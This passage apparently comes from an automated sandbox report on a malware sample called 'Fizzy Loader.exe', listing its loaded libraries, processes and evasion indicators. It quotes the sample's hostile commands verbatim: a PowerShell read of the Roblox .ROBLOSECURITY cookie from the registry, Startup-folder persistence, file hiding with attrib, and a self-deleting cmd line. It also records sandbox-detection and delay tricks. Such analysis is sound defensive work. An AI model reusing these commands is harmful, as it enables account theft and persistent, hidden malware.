                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: Fizzy Loader.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Fizzy Loader.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Fizzy Loader.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        Source: C:\Users\user\Desktop\Fizzy Loader.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: Fizzy Loader.exe, Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe, Code function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe, Code function: 0_2_00007FF849114D59 pushad ; ret 0_2_00007FF849114D69
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_00007FF848DFD2A5 pushad ; iretd 6_2_00007FF848DFD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_00007FF848FE2316 push 8B485F94h; iretd 6_2_00007FF848FE231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00007FF848F400BD pushad ; iretd 9_2_00007FF848F400C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_00007FF848F300BD pushad ; iretd 11_2_00007FF848F300C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_00007FF848F36387 push esp; retf 11_2_00007FF848F36388
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_00007FF8490007A8 pushad ; iretd 11_2_00007FF849000836
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 14_2_00007FF848F300BD pushad ; iretd 14_2_00007FF848F300C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 22_2_00007FF848F200BD pushad ; iretd 22_2_00007FF848F200C1

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"

                        Boot Survival

                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr\:Zone.Identifier:$DATA

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeMemory allocated: 172AF0E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeMemory allocated: 172C8B40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597202Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596874Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596546Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596325Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596218Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596109Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596000Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595889Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595780Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595671Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595562Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595451Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595341Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595234Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595125Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595012Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594899Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594793Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594627Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594500Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594283Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594156Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593890Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593781Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593672Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593547Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593328Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593207Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593093Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592982Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592873Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592538Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592422Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592297Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592187Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592078Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591968Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591842Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591732Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591621Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591512Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591312Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591118Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 590948Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 590812Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
